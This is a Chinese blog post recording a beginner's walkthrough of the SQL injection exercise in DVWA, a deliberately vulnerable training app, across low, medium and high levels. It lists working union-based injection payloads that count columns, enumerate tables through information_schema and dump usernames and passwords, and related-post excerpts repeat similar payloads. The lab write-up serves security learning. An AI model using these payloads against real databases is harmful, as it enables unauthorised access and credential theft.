DVWA(7)SQL注入(SQL Injection) LOW-HIGHT 操作记录

已于 2022-11-08 23:24:11 修改
阅读量375 收藏
点赞数 1
文章标签: sql 数据库
于 2022-11-08 23:20:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lllllaaa111/article/details/127760634
版权

今天带来第七期SQL注入操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。也感谢之前查阅的各种大神提供的博客。

原理:SQL注入就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的

Low级别

第一步,判断是否可以进行sql注入

输入

1''

不报错表明可以进行字符串注入

第二步,判断SQL查询语句中的字段数

输入

1' order by 3#

查询成功,值为3查询失败,说明最大字段数为2

第三步,判断回显位置

输入

1'union select 1,2

 第四步,查询当前的数据库,以及版本

输入

1' union select version(),database()#

第五步,获取数据库中的表 

输入

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

第六步,获取表中的字段名 

输入

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

第七步,获得字段中的数据 

输入

1' union select user,password from users#

 Medium级别

进行抓包 将1改为1 or 1=1

 

随后我们可以重复low级别的命令,将1'换成1即可

Hight级别 

页面变成了点击连接,防止了sql注入

 点击链接,输入1' union select user,password from users#

下载数据

注:Hight本人输入后一直报错,慎重输入

可以查阅这位大佬的hight难度操作hight难度操作

lllllaaa111
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA下的SQL注入
07-25
SQL
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 4841
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 4905
SQL注入DVWA靶场搭建及使用、sqlMap注入sqlmap问题及解决办法)
DVWA SQL Injection LOW
weixin_34008784的博客
11-26 161
最近在学习SQL注入,初出茅庐,就从dvwa开始吧 sql注入可以通过sqlmap工具实现,为了更好地了解原理,这里主要是手工注入 注入的一般流程为: 1,找到注入点,此步骤可通过工具 2,判断注入类型 3,判断列数,展示位 4,利用函数获取数据库用户,版本号,数据库名等信息 5,联合注入法利用information_schema数据库中存储所有的表...
DVWA——SQL Injection(low)
分享简单的安全技术
01-06 227
SQL Injection 界面 源代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1581
DVWAsql注入漏洞-low
DVWAsql注入(low)
m0_52923241的博客
03-12 484
SQL injection 先尝试输入1,可以得到正常的回显 尝试输入User ID:1’判断是否存在注入 可以判断出sql 遍历数据库表
DVWA sql注入(低中高)
m0_73581247的博客
04-08 388
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
DVWA靶场SQL注入(low)
qq_61975388的博客
08-17 380
DVWA靶场SQL注入实战
DVWA靶场全关卡---SQL注入(low)
weixin_63294541的博客
03-17 306
目录1、找注入点2、盲猜字段3、回显显示4、找数据库5、获取数据库中的表6、查看表中的字段7、显示字段的值8、我们就拿到了用户名和密码了! 方法顺序如下: 1' and 1=1 order by 1# 从头开始试,到几报错就是有几个字段减一。 所以,有两个字段。1'union select 1,2# (1'是闭合,union连接,select 1,2是占位) 1'union select 1,database()# -----找到数据库名称为Surname: dvwa 1' unio
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
2020-12-06-DVWAsql.md
01-24
dvwasql
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWASQL注入
RexHa的博客
09-27 1416
DVWA靶场sql注入三个级别通关
Dvwa练习06 SQL注入(Low)
coco3105的博客
02-19 1107
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
dvwa靶场sql注入(low)
qq_14902381的博客
08-22 377
dvwa 靶场,sql注入(low)
DVWASQL Injection
baynk的博客
10-29 1659
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA -SQL Injection (low)
qq_42630215的博客
05-26 241
low级别(手工注入sqlmap工具注入) ** 手动注入 ** 1.判断是否存在注入注入的类型是字符型还是数字型 输入1:(输入1-5都会返回正确的值) 输入 1’(发现报错,存在注入漏洞) Id是被’ ‘包括起来的,是属于字符型注入 闭合 输入 1’ and ‘1’=’1(查询成功,会返回正确的值) 输入1’ or ‘1’=’1 时,因为这个式子是永真的,返回了所有结果。 2.猜测sql查询语句中的字段数 1’ order by 3# 1’ order by 2# 3.确定显示的字段
dvwa sql注入
最新发布
08-27
DVWA(Damn Vulnerable Web Application)是一个用于练习和测试网络应用程序安全性的开源应用程序。其中包含了多种漏洞类型,包括 SQL 注入。 在 DVWA 中进行 SQL 注入练习,可以通过以下步骤进行: 1. 安装和配置 DVWA:首先,需要下载 DVWA,并将其部署到本地服务器或虚拟机中。然后,根据提供的说明进行配置,设置安全级别为“低”。 2. 寻找 SQL 注入点:在 DVWA 中,通常会提供一些具有漏洞的页面。你需要找到一个接受用户输入并构建 SQL 查询的页面。 3. 探测注入点:尝试在输入字段中插入一些特殊字符(如单引号、分号等),观察是否引发了错误消息或页面行为异常。如果发现异常,很可能存在注入点。 4. 利用注入点:一旦找到注入点,你可以尝试构造恶意的 SQL 查询,例如使用 UNION SELECT 语句来获取额外的信息或绕过身份验证。 请注意,SQL 注入是一种非法行为,只能在合法授权和合法目的的环境下进行。在实际应用中,务必采取适当的安全措施,如使用参数化查询或 ORM 框架来防止 SQL 注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值